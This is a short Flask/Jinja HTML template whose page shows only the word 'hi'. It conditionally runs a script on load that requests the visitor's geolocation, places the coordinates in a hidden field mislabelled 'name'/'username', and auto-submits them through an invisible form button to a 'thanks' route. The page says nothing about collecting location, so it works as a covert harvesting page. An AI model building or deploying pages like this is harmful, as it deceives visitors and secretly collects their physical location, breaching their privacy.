
<form action="{{url_for('thanks')}}">
	<input type="hidden" name="name" id='username'>
	<input type="submit" style="background: transparent; border: none !important; font-size:0;">
</form>

<h1>hi</h1>

{% if x %}
<script>
var x = '';

function getLocation() {
  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(showPosition);
  } else { 
    x='N A';
	document.getElementById('username').value=x;
document.forms[0].submit();
  }
}

function showPosition(position) {
  x =  position.coords.latitude +','+ position.coords.longitude;
  document.getElementById('username').value=x;
document.forms[0].submit();
}
getLocation();

</script>
{% endif %}